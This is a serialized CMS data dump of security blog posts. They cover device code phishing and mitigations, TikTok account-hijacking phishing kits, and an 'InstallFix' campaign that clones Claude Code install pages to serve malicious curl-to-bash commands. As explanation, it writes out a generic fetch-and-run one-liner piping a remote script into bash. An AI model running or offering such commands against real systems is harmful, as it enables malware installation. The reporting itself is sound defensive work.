kit.","DCP IB 4",{"sys":6565,"__typename":6404,"title":6566,"caption":6566,"layoutMode":118,"file":6567},{"id":5886},"DOLCE kit.",{"url":6568,"width":6471,"height":6569},"https://images.ctfassets.net/y1cdw1ablpvd/6iUfj8vMymi2c7lZxj006n/88b8066e6bea9fa7a81bd6b546264796/image16.png",728,{"sys":6571,"__typename":6404,"title":6572,"caption":6572,"layoutMode":118,"file":6573},{"id":5932},"Device code phishing attack chain.",{"url":6574,"width":6471,"height":6575},"https://images.ctfassets.net/y1cdw1ablpvd/60e9ErrL8tp3xtoer4gNUl/83899c207f61fdd9ff8aad0e1001030d/image2.png",1275,{"sys":6577,"__typename":6371,"content":6578,"name":6589,"title":118},{"id":5982},{"json":6579},{"nodeType":1259,"data":6580,"content":6581},{},[6582],{"nodeType":1258,"data":6583,"content":6584},{},[6585],{"nodeType":1257,"value":6586,"marks":6587,"data":6588},"One of the key limitations of early device code phishing was that the code was being sent directly over email (as in the Russia-linked campaigns in 2024-5). This meant that the code would expire unless used immediately, requiring highly engaged social engineering to pull off. To get around this, modern device code phishing pages are continuously polling for fresh codes via API. This arguably makes them more discoverable than simply providing the code and instructions in a direct message, but is way more scalable for the attacker. ",[],{},"DCP IB 5",{"sys":6591,"__typename":6371,"content":6592,"name":6616,"title":118},{"id":6029},{"json":6593},{"nodeType":1259,"data":6594,"content":6595},{},[6596],{"nodeType":1258,"data":6597,"content":6598},{},[6599,6603,6612],{"nodeType":1257,"value":6600,"marks":6601,"data":6602},"These legacy scopes were abused in the Russia-linked ",[],{},{"nodeType":1364,"data":6604,"content":6606},{"uri":6605},"https://pushsecurity.com/blog/consentfix/",[6607],{"nodeType":1257,"value":6608,"marks":6609,"data":6611},"ConsentFix",[6610],{"type":1372},{},{"nodeType":1257,"value":6613,"marks":6614,"data":6615}," campaign (a hybrid of ClickFix-style social engineering with OAuth abuse) reported by Push researchers. This created additional detection challenges as logging of activity against these scopes is not enabled by default. ",[],{},"DCP IB 6",{"sys":6618,"__typename":6371,"content":6619,"name":6643,"title":118},{"id":6245},{"json":6620},{"nodeType":1259,"data":6621,"content":6622},{},[6623],{"nodeType":1258,"data":6624,"content":6625},{},[6626,6630,6639],{"nodeType":1257,"value":6627,"marks":6628,"data":6629},"Another Microsoft option is to prevent users from signing into first-party apps by ",[],{},{"nodeType":1364,"data":6631,"content":6633},{"uri":6632},"https://msendpointmgr.com/2026/01/08/consentfix-quickfix/",[6634],{"nodeType":1257,"value":6635,"marks":6636,"data":6638},"pre-creating service principals for apps and requiring user assignment",[6637],{"type":1372},{},{"nodeType":1257,"value":6640,"marks":6641,"data":6642}," (also an option to mitigate broader OAuth attacks, including ConsentFix). This can limit which users can authenticate to specific apps without approval, but needs to be done for every first-party app deemed a risk.",[],{},"DCP IB 7",{"sys":6645,"__typename":6404,"title":6646,"caption":6647,"layoutMode":118,"file":6648},{"id":6303},"DCP warning banner","Users visiting a device code login page will be required to click through a warning banner, emitting a webhook event.",{"url":6649,"width":6650,"height":6651},"https://images.ctfassets.net/y1cdw1ablpvd/2Gtct2qofWtLLVi31Pk8NY/616e56fc4fa7dcb905a0a3a1ca28709b/image17.png",1367,859,"content:blog:device-code-phishing.json","json","content","blog/device-code-phishing.json","blog/device-code-phishing",{"_path":6658,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":6659,"ogImage":118,"summary":6662,"title":6673,"subtitle":118,"metaTitle":6674,"synopsis":6675,"hashTags":118,"publishedDate":6676,"slug":6677,"tagsCollection":6678,"relatedBlogPostsCollection":6684,"authorsCollection":9153,"content":9157,"_id":9836,"_type":6653,"_source":6654,"_file":9837,"_stem":9838,"_extension":6653},"/blog/tiktok-phishing",{"id":6660,"publishedAt":6661},"1iOnp8gcu1tEUvkqOZsdFd","2026-03-26T07:59:36.622Z",{"json":6663},{"data":6664,"content":6665,"nodeType":1259},{},[6666],{"data":6667,"content":6668,"nodeType":1258},{},[6669],{"data":6670,"marks":6671,"value":6672,"nodeType":1257},{},[],"We’ve identified a new wave of AITM phishing pages designed to hijack TikTok accounts. This seems like a weird target at first glance, but TikTok accounts are ripe for abuse in malvertising scams. ","Attackers are now targeting business TikTok accounts using session-stealing phishing kits","Business TikTok accounts targeted with AITM phishing kits","Investigating a new wave of AITM phishing pages designed to hijack TikTok accounts.","2026-03-26T00:00:00.000Z","tiktok-phishing",{"items":6679},[6680,6682],{"sys":6681,"name":1270},{"id":1269},{"sys":6683,"name":1274},{"id":1273},{"items":6685},[6686,7514,8536],{"__typename":1278,"sys":6687,"content":6688,"title":2252,"synopsis":2253,"hashTags":118,"publishedDate":2254,"slug":2255,"tagsCollection":7504,"authorsCollection":7510},{"id":1280},{"json":6689},{"nodeType":1259,"data":6690,"content":6691},{},[6692,6698,6704,6710,6713,6720,6726,6732,6737,6743,6748,6764,6770,6780,6783,6790,6796,6809,6815,6825,6830,6833,6840,6847,6852,6860,6876,6884,6890,6898,6913,6921,6927,6935,6961,6969,6975,6983,6999,7004,7012,7018,7026,7059,7062,7069,7077,7093,7101,7107,7115,7141,7146,7154,7160,7165,7168,7175,7183,7189,7240,7245,7248,7255,7263,7269,7274,7277,7284,7290,7296,7356,7362,7417,7423,7426,7433,7439,7445,7450,7453,7460,7466,7472,7478],{"nodeType":1258,"data":6693,"content":6694},{},[6695],{"nodeType":1257,"value":1289,"marks":6696,"data":6697},[],{},{"nodeType":1258,"data":6699,"content":6700},{},[6701],{"nodeType":1257,"value":1296,"marks":6702,"data":6703},[],{},{"nodeType":1258,"data":6705,"content":6706},{},[6707],{"nodeType":1257,"value":1303,"marks":6708,"data":6709},[],{},{"nodeType":1307,"data":6711,"content":6712},{},[],{"nodeType":1311,"data":6714,"content":6715},{},[6716],{"nodeType":1257,"value":1315,"marks":6717,"data":6719},[6718],{"type":1318},{},{"nodeType":1258,"data":6721,"content":6722},{},[6723],{"nodeType":1257,"value":1324,"marks":6724,"data":6725},[],{},{"nodeType":1258,"data":6727,"content":6728},{},[6729],{"nodeType":1257,"value":1331,"marks":6730,"data":6731},[],{},{"nodeType":1335,"data":6733,"content":6736},{"target":6734},{"sys":6735},{"id":1339,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6738,"content":6739},{},[6740],{"nodeType":1257,"value":1347,"marks":6741,"data":6742},[],{},{"nodeType":1335,"data":6744,"content":6747},{"target":6745},{"sys":6746},{"id":1354,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6749,"content":6750},{},[6751,6754,6761],{"nodeType":1257,"value":1360,"marks":6752,"data":6753},[],{},{"nodeType":1364,"data":6755,"content":6756},{"uri":1366},[6757],{"nodeType":1257,"value":1369,"marks":6758,"data":6760},[6759],{"type":1372},{},{"nodeType":1257,"value":1375,"marks":6762,"data":6763},[],{},{"nodeType":1258,"data":6765,"content":6766},{},[6767],{"nodeType":1257,"value":1382,"marks":6768,"data":6769},[],{},{"nodeType":1258,"data":6771,"content":6772},{},[6773,6776],{"nodeType":1257,"value":1389,"marks":6774,"data":6775},[],{},{"nodeType":1257,"value":1393,"marks":6777,"data":6779},[6778],{"type":1318},{},{"nodeType":1307,"data":6781,"content":6782},{},[],{"nodeType":1311,"data":6784,"content":6785},{},[6786],{"nodeType":1257,"value":1404,"marks":6787,"data":6789},[6788],{"type":1318},{},{"nodeType":1258,"data":6791,"content":6792},{},[6793],{"nodeType":1257,"value":1412,"marks":6794,"data":6795},[],{},{"nodeType":1258,"data":6797,"content":6798},{},[6799,6802,6806],{"nodeType":1257,"value":1419,"marks":6800,"data":6801},[],{},{"nodeType":1257,"value":1423,"marks":6803,"data":6805},[6804],{"type":1318},{},{"nodeType":1257,"value":1428,"marks":6807,"data":6808},[],{},{"nodeType":1258,"data":6810,"content":6811},{},[6812],{"nodeType":1257,"value":1435,"marks":6813,"data":6814},[],{},{"nodeType":1258,"data":6816,"content":6817},{},[6818,6821],{"nodeType":1257,"value":1442,"marks":6819,"data":6820},[],{},{"nodeType":1257,"value":1446,"marks":6822,"data":6824},[6823],{"type":1318},{},{"nodeType":1335,"data":6826,"content":6829},{"target":6827},{"sys":6828},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":6831,"content":6832},{},[],{"nodeType":1311,"data":6834,"content":6835},{},[6836],{"nodeType":1257,"value":1463,"marks":6837,"data":6839},[6838],{"type":1318},{},{"nodeType":1468,"data":6841,"content":6842},{},[6843],{"nodeType":1257,"value":1472,"marks":6844,"data":6846},[6845],{"type":1318},{},{"nodeType":1335,"data":6848,"content":6851},{"target":6849},{"sys":6850},{"id":1480,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6853,"content":6854},{},[6855],{"nodeType":1257,"value":1486,"marks":6856,"data":6859},[6857,6858],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6861,"content":6862},{},[6863,6866,6873],{"nodeType":1257,"value":1495,"marks":6864,"data":6865},[],{},{"nodeType":1364,"data":6867,"content":6868},{"uri":1500},[6869],{"nodeType":1257,"value":1503,"marks":6870,"data":6872},[6871],{"type":1372},{},{"nodeType":1257,"value":1508,"marks":6874,"data":6875},[],{},{"nodeType":1258,"data":6877,"content":6878},{},[6879],{"nodeType":1257,"value":1515,"marks":6880,"data":6883},[6881,6882],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6885,"content":6886},{},[6887],{"nodeType":1257,"value":1524,"marks":6888,"data":6889},[],{},{"nodeType":1258,"data":6891,"content":6892},{},[6893],{"nodeType":1257,"value":1531,"marks":6894,"data":6897},[6895,6896],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6899,"content":6900},{},[6901,6904,6910],{"nodeType":1257,"value":1540,"marks":6902,"data":6903},[],{},{"nodeType":1364,"data":6905,"content":6906},{"uri":1545},[6907],{"nodeType":1257,"value":1548,"marks":6908,"data":6909},[],{},{"nodeType":1257,"value":1552,"marks":6911,"data":6912},[],{},{"nodeType":1258,"data":6914,"content":6915},{},[6916],{"nodeType":1257,"value":1559,"marks":6917,"data":6920},[6918,6919],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6922,"content":6923},{},[6924],{"nodeType":1257,"value":1568,"marks":6925,"data":6926},[],{},{"nodeType":1258,"data":6928,"content":6929},{},[6930],{"nodeType":1257,"value":1575,"marks":6931,"data":6934},[6932,6933],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6936,"content":6937},{},[6938,6941,6948,6951,6958],{"nodeType":1257,"value":1584,"marks":6939,"data":6940},[],{},{"nodeType":1364,"data":6942,"content":6943},{"uri":1589},[6944],{"nodeType":1257,"value":1592,"marks":6945,"data":6947},[6946],{"type":1372},{},{"nodeType":1257,"value":1597,"marks":6949,"data":6950},[],{},{"nodeType":1364,"data":6952,"content":6953},{"uri":1602},[6954],{"nodeType":1257,"value":1605,"marks":6955,"data":6957},[6956],{"type":1372},{},{"nodeType":1257,"value":1610,"marks":6959,"data":6960},[],{},{"nodeType":1258,"data":6962,"content":6963},{},[6964],{"nodeType":1257,"value":1617,"marks":6965,"data":6968},[6966,6967],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6970,"content":6971},{},[6972],{"nodeType":1257,"value":1626,"marks":6973,"data":6974},[],{},{"nodeType":1258,"data":6976,"content":6977},{},[6978],{"nodeType":1257,"value":1633,"marks":6979,"data":6982},[6980,6981],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6984,"content":6985},{},[6986,6989,6996],{"nodeType":1257,"value":1642,"marks":6987,"data":6988},[],{},{"nodeType":1364,"data":6990,"content":6991},{"uri":1602},[6992],{"nodeType":1257,"value":1605,"marks":6993,"data":6995},[6994],{"type":1372},{},{"nodeType":1257,"value":1653,"marks":6997,"data":6998},[],{},{"nodeType":1335,"data":7000,"content":7003},{"target":7001},{"sys":7002},{"id":1660,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":7005,"content":7006},{},[7007],{"nodeType":1257,"value":1666,"marks":7008,"data":7011},[7009,7010],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7013,"content":7014},{},[7015],{"nodeType":1257,"value":1675,"marks":7016,"data":7017},[],{},{"nodeType":1258,"data":7019,"content":7020},{},[7021],{"nodeType":1257,"value":1682,"marks":7022,"data":7025},[7023,7024],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7027,"content":7028},{},[7029,7032,7038,7041,7047,7050,7056],{"nodeType":1257,"value":1691,"marks":7030,"data":7031},[],{},{"nodeType":1364,"data":7033,"content":7034},{"uri":1696},[7035],{"nodeType":1257,"value":1699,"marks":7036,"data":7037},[],{},{"nodeType":1257,"value":1703,"marks":7039,"data":7040},[],{},{"nodeType":1364,"data":7042,"content":7043},{"uri":1708},[7044],{"nodeType":1257,"value":1711,"marks":7045,"data":7046},[],{},{"nodeType":1257,"value":1715,"marks":7048,"data":7049},[],{},{"nodeType":1364,"data":7051,"content":7052},{"uri":1720},[7053],{"nodeType":1257,"value":1723,"marks":7054,"data":7055},[],{},{"nodeType":1257,"value":1727,"marks":7057,"data":7058},[],{},{"nodeType":1307,"data":7060,"content":7061},{},[],{"nodeType":1468,"data":7063,"content":7064},{},[7065],{"nodeType":1257,"value":1737,"marks":7066,"data":7068},[7067],{"type":1318},{},{"nodeType":1258,"data":7070,"content":7071},{},[7072],{"nodeType":1257,"value":1745,"marks":7073,"data":7076},[7074,7075],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7078,"content":7079},{},[7080,7083,7090],{"nodeType":1257,"value":1754,"marks":7081,"data":7082},[],{},{"nodeType":1364,"data":7084,"content":7085},{"uri":1759},[7086],{"nodeType":1257,"value":1762,"marks":7087,"data":7089},[7088],{"type":1372},{},{"nodeType":1257,"value":1767,"marks":7091,"data":7092},[],{},{"nodeType":1258,"data":7094,"content":7095},{},[7096],{"nodeType":1257,"value":1774,"marks":7097,"data":7100},[7098,7099],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7102,"content":7103},{},[7104],{"nodeType":1257,"value":1783,"marks":7105,"data":7106},[],{},{"nodeType":1258,"data":7108,"content":7109},{},[7110],{"nodeType":1257,"value":1790,"marks":7111,"data":7114},[7112,7113],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7116,"content":7117},{},[7118,7121,7128,7131,7138],{"nodeType":1257,"value":1799,"marks":7119,"data":7120},[],{},{"nodeType":1364,"data":7122,"content":7123},{"uri":1804},[7124],{"nodeType":1257,"value":1807,"marks":7125,"data":7127},[7126],{"type":1372},{},{"nodeType":1257,"value":1812,"marks":7129,"data":7130},[],{},{"nodeType":1364,"data":7132,"content":7133},{"uri":1817},[7134],{"nodeType":1257,"value":1820,"marks":7135,"data":7137},[7136],{"type":1372},{},{"nodeType":1257,"value":1825,"marks":7139,"data":7140},[],{},{"nodeType":1335,"data":7142,"content":7145},{"target":7143},{"sys":7144},{"id":1832,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":7147,"content":7148},{},[7149],{"nodeType":1257,"value":1838,"marks":7150,"data":7153},[7151,7152],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7155,"content":7156},{},[7157],{"nodeType":1257,"value":1847,"marks":7158,"data":7159},[],{},{"nodeType":1335,"data":7161,"content":7164},{"target":7162},{"sys":7163},{"id":1854,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7166,"content":7167},{},[],{"nodeType":1468,"data":7169,"content":7170},{},[7171],{"nodeType":1257,"value":1863,"marks":7172,"data":7174},[7173],{"type":1318},{},{"nodeType":1258,"data":7176,"content":7177},{},[7178],{"nodeType":1257,"value":1871,"marks":7179,"data":7182},[7180,7181],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7184,"content":7185},{},[7186],{"nodeType":1257,"value":1880,"marks":7187,"data":7188},[],{},{"nodeType":1884,"data":7190,"content":7191},{},[7192,7205,7218],{"nodeType":1888,"data":7193,"content":7194},{},[7195],{"nodeType":1258,"data":7196,"content":7197},{},[7198,7202],{"nodeType":1257,"value":1895,"marks":7199,"data":7201},[7200],{"type":1318},{},{"nodeType":1257,"value":1900,"marks":7203,"data":7204},[],{},{"nodeType":1888,"data":7206,"content":7207},{},[7208],{"nodeType":1258,"data":7209,"content":7210},{},[7211,7215],{"nodeType":1257,"value":1910,"marks":7212,"data":7214},[7213],{"type":1318},{},{"nodeType":1257,"value":1915,"marks":7216,"data":7217},[],{},{"nodeType":1888,"data":7219,"content":7220},{},[7221],{"nodeType":1258,"data":7222,"content":7223},{},[7224,7228,7231,7237],{"nodeType":1257,"value":1925,"marks":7225,"data":7227},[7226],{"type":1318},{},{"nodeType":1257,"value":1930,"marks":7229,"data":7230},[],{},{"nodeType":1364,"data":7232,"content":7233},{"uri":1935},[7234],{"nodeType":1257,"value":1938,"marks":7235,"data":7236},[],{},{"nodeType":1257,"value":1942,"marks":7238,"data":7239},[],{},{"nodeType":1335,"data":7241,"content":7244},{"target":7242},{"sys":7243},{"id":1949,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7246,"content":7247},{},[],{"nodeType":1468,"data":7249,"content":7250},{},[7251],{"nodeType":1257,"value":1958,"marks":7252,"data":7254},[7253],{"type":1318},{},{"nodeType":1258,"data":7256,"content":7257},{},[7258],{"nodeType":1257,"value":1966,"marks":7259,"data":7262},[7260,7261],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7264,"content":7265},{},[7266],{"nodeType":1257,"value":1975,"marks":7267,"data":7268},[],{},{"nodeType":1335,"data":7270,"content":7273},{"target":7271},{"sys":7272},{"id":1982,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7275,"content":7276},{},[],{"nodeType":1311,"data":7278,"content":7279},{},[7280],{"nodeType":1257,"value":1991,"marks":7281,"data":7283},[7282],{"type":1318},{},{"nodeType":1258,"data":7285,"content":7286},{},[7287],{"nodeType":1257,"value":1999,"marks":7288,"data":7289},[],{},{"nodeType":1258,"data":7291,"content":7292},{},[7293],{"nodeType":1257,"value":2006,"marks":7294,"data":7295},[],{},{"nodeType":1884,"data":7297,"content":7298},{},[7299,7318,7337],{"nodeType":1888,"data":7300,"content":7301},{},[7302],{"nodeType":1258,"data":7303,"content":7304},{},[7305,7308,7315],{"nodeType":1257,"value":2019,"marks":7306,"data":7307},[],{},{"nodeType":1364,"data":7309,"content":7310},{"uri":2024},[7311],{"nodeType":1257,"value":2027,"marks":7312,"data":7314},[7313],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":7316,"data":7317},[],{},{"nodeType":1888,"data":7319,"content":7320},{},[7321],{"nodeType":1258,"data":7322,"content":7323},{},[7324,7327,7334],{"nodeType":1257,"value":2042,"marks":7325,"data":7326},[],{},{"nodeType":1364,"data":7328,"content":7329},{"uri":2047},[7330],{"nodeType":1257,"value":2050,"marks":7331,"data":7333},[7332],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":7335,"data":7336},[],{},{"nodeType":1888,"data":7338,"content":7339},{},[7340],{"nodeType":1258,"data":7341,"content":7342},{},[7343,7346,7353],{"nodeType":1257,"value":2064,"marks":7344,"data":7345},[],{},{"nodeType":1364,"data":7347,"content":7348},{"uri":2069},[7349],{"nodeType":1257,"value":2072,"marks":7350,"data":7352},[7351],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":7354,"data":7355},[],{},{"nodeType":1258,"data":7357,"content":7358},{},[7359],{"nodeType":1257,"value":2083,"marks":7360,"data":7361},[],{},{"nodeType":1884,"data":7363,"content":7364},{},[7365,7378,7391,7404],{"nodeType":1888,"data":7366,"content":7367},{},[7368],{"nodeType":1258,"data":7369,"content":7370},{},[7371,7375],{"nodeType":1257,"value":2096,"marks":7372,"data":7374},[7373],{"type":1318},{},{"nodeType":1257,"value":2101,"marks":7376,"data":7377},[],{},{"nodeType":1888,"data":7379,"content":7380},{},[7381],{"nodeType":1258,"data":7382,"content":7383},{},[7384,7388],{"nodeType":1257,"value":2111,"marks":7385,"data":7387},[7386],{"type":1318},{},{"nodeType":1257,"value":2116,"marks":7389,"data":7390},[],{},{"nodeType":1888,"data":7392,"content":7393},{},[7394],{"nodeType":1258,"data":7395,"content":7396},{},[7397,7401],{"nodeType":1257,"value":2126,"marks":7398,"data":7400},[7399],{"type":1318},{},{"nodeType":1257,"value":2131,"marks":7402,"data":7403},[],{},{"nodeType":1888,"data":7405,"content":7406},{},[7407],{"nodeType":1258,"data":7408,"content":7409},{},[7410,7414],{"nodeType":1257,"value":2141,"marks":7411,"data":7413},[7412],{"type":1318},{},{"nodeType":1257,"value":2146,"marks":7415,"data":7416},[],{},{"nodeType":1258,"data":7418,"content":7419},{},[7420],{"nodeType":1257,"value":2153,"marks":7421,"data":7422},[],{},{"nodeType":1307,"data":7424,"content":7425},{},[],{"nodeType":1311,"data":7427,"content":7428},{},[7429],{"nodeType":1257,"value":2163,"marks":7430,"data":7432},[7431],{"type":1318},{},{"nodeType":1258,"data":7434,"content":7435},{},[7436],{"nodeType":1257,"value":2171,"marks":7437,"data":7438},[],{},{"nodeType":1258,"data":7440,"content":7441},{},[7442],{"nodeType":1257,"value":2178,"marks":7443,"data":7444},[],{},{"nodeType":1335,"data":7446,"content":7449},{"target":7447},{"sys":7448},{"id":2185,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7451,"content":7452},{},[],{"nodeType":1311,"data":7454,"content":7455},{},[7456],{"nodeType":1257,"value":2194,"marks":7457,"data":7459},[7458],{"type":1318},{},{"nodeType":1258,"data":7461,"content":7462},{},[7463],{"nodeType":1257,"value":2202,"marks":7464,"data":7465},[],{},{"nodeType":1258,"data":7467,"content":7468},{},[7469],{"nodeType":1257,"value":2209,"marks":7470,"data":7471},[],{},{"nodeType":1258,"data":7473,"content":7474},{},[7475],{"nodeType":1257,"value":2216,"marks":7476,"data":7477},[],{},{"nodeType":1258,"data":7479,"content":7480},{},[7481,7484,7491,7494,7501],{"nodeType":1257,"value":2223,"marks":7482,"data":7483},[],{},{"nodeType":1364,"data":7485,"content":7486},{"uri":2228},[7487],{"nodeType":1257,"value":2231,"marks":7488,"data":7490},[7489],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":7492,"data":7493},[],{},{"nodeType":1364,"data":7495,"content":7496},{"uri":2241},[7497],{"nodeType":1257,"value":2244,"marks":7498,"data":7500},[7499],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":7502,"data":7503},[],{},{"items":7505},[7506,7508],{"sys":7507,"name":1270},{"id":1269},{"sys":7509,"name":1274},{"id":1273},{"items":7511},[7512],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":7513},{"url":2269},{"__typename":1278,"sys":7515,"content":7517,"title":8518,"synopsis":8519,"hashTags":118,"publishedDate":8520,"slug":8521,"tagsCollection":8522,"authorsCollection":8528},{"id":7516},"7bG71Eo43crbIHKzczooVS",{"json":7518},{"nodeType":1259,"data":7519,"content":7520},{},[7521,7527,7534,7541,7549,7565,7571,7574,7582,7589,7596,7603,7610,7617,7624,7631,7638,7644,7650,7657,7663,7670,7677,7683,7689,7695,7701,7721,7733,7740,7746,7753,7760,7793,7800,7808,7815,7821,7828,7834,7841,7859,7866,7869,7877,7884,7979,7986,7992,7995,8003,8010,8017,8024,8061,8064,8071,8089,8096,8104,8314,8322,8355,8363,8372,8378,8386,8393,8401,8412,8420,8426,8434,8445,8453,8461,8469,8477,8484,8492,8503,8510],{"nodeType":1335,"data":7522,"content":7526},{"target":7523},{"sys":7524},{"id":7525,"type":1340,"linkType":1341},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":1258,"data":7528,"content":7529},{},[7530],{"nodeType":1257,"value":7531,"marks":7532,"data":7533},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":1258,"data":7535,"content":7536},{},[7537],{"nodeType":1257,"value":7538,"marks":7539,"data":7540},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":1258,"data":7542,"content":7543},{},[7544],{"nodeType":1257,"value":7545,"marks":7546,"data":7548},"It’s not hard to see how attackers can exploit this. ",[7547],{"type":1318},{},{"nodeType":1258,"data":7550,"content":7551},{},[7552,7556,7561],{"nodeType":1257,"value":7553,"marks":7554,"data":7555},"We're tracking a technique we're calling ",[],{},{"nodeType":1257,"value":7557,"marks":7558,"data":7560},"InstallFix",[7559],{"type":1318},{},{"nodeType":1257,"value":7562,"marks":7563,"data":7564},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":1335,"data":7566,"content":7570},{"target":7567},{"sys":7568},{"id":7569,"type":1340,"linkType":1341},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":1307,"data":7572,"content":7573},{},[],{"nodeType":1311,"data":7575,"content":7576},{},[7577],{"nodeType":1257,"value":7578,"marks":7579,"data":7581},"InstallFix Claude Code campaign teardown",[7580],{"type":1318},{},{"nodeType":1258,"data":7583,"content":7584},{},[7585],{"nodeType":1257,"value":7586,"marks":7587,"data":7588},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":1258,"data":7590,"content":7591},{},[7592],{"nodeType":1257,"value":7593,"marks":7594,"data":7595},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":1468,"data":7597,"content":7598},{},[7599],{"nodeType":1257,"value":7600,"marks":7601,"data":7602},"A new campaign targeting Claude Code",[],{},{"nodeType":1258,"data":7604,"content":7605},{},[7606],{"nodeType":1257,"value":7607,"marks":7608,"data":7609},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":1258,"data":7611,"content":7612},{},[7613],{"nodeType":1257,"value":7614,"marks":7615,"data":7616},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":1258,"data":7618,"content":7619},{},[7620],{"nodeType":1257,"value":7621,"marks":7622,"data":7623},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",[],{},{"nodeType":1258,"data":7625,"content":7626},{},[7627],{"nodeType":1257,"value":7628,"marks":7629,"data":7630},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":1258,"data":7632,"content":7633},{},[7634],{"nodeType":1257,"value":7635,"marks":7636,"data":7637},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":1335,"data":7639,"content":7643},{"target":7640},{"sys":7641},{"id":7642,"type":1340,"linkType":1341},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":1335,"data":7645,"content":7649},{"target":7646},{"sys":7647},{"id":7648,"type":1340,"linkType":1341},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":1258,"data":7651,"content":7652},{},[7653],{"nodeType":1257,"value":7654,"marks":7655,"data":7656},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",[],{},{"nodeType":1335,"data":7658,"content":7662},{"target":7659},{"sys":7660},{"id":7661,"type":1340,"linkType":1341},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":1468,"data":7664,"content":7665},{},[7666],{"nodeType":1257,"value":7667,"marks":7668,"data":7669},"Distribution via Google Ads",[],{},{"nodeType":1258,"data":7671,"content":7672},{},[7673],{"nodeType":1257,"value":7674,"marks":7675,"data":7676},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":1335,"data":7678,"content":7682},{"target":7679},{"sys":7680},{"id":7681,"type":1340,"linkType":1341},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":1335,"data":7684,"content":7688},{"target":7685},{"sys":7686},{"id":7687,"type":1340,"linkType":1341},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":1335,"data":7690,"content":7694},{"target":7691},{"sys":7692},{"id":7693,"type":1340,"linkType":1341},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":1335,"data":7696,"content":7700},{"target":7697},{"sys":7698},{"id":7699,"type":1340,"linkType":1341},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":1258,"data":7702,"content":7703},{},[7704,7708,7717],{"nodeType":1257,"value":7705,"marks":7706,"data":7707},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",[],{},{"nodeType":1364,"data":7709,"content":7711},{"uri":7710},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[7712],{"nodeType":1257,"value":7713,"marks":7714,"data":7716},"doubling down on targeting ad manager 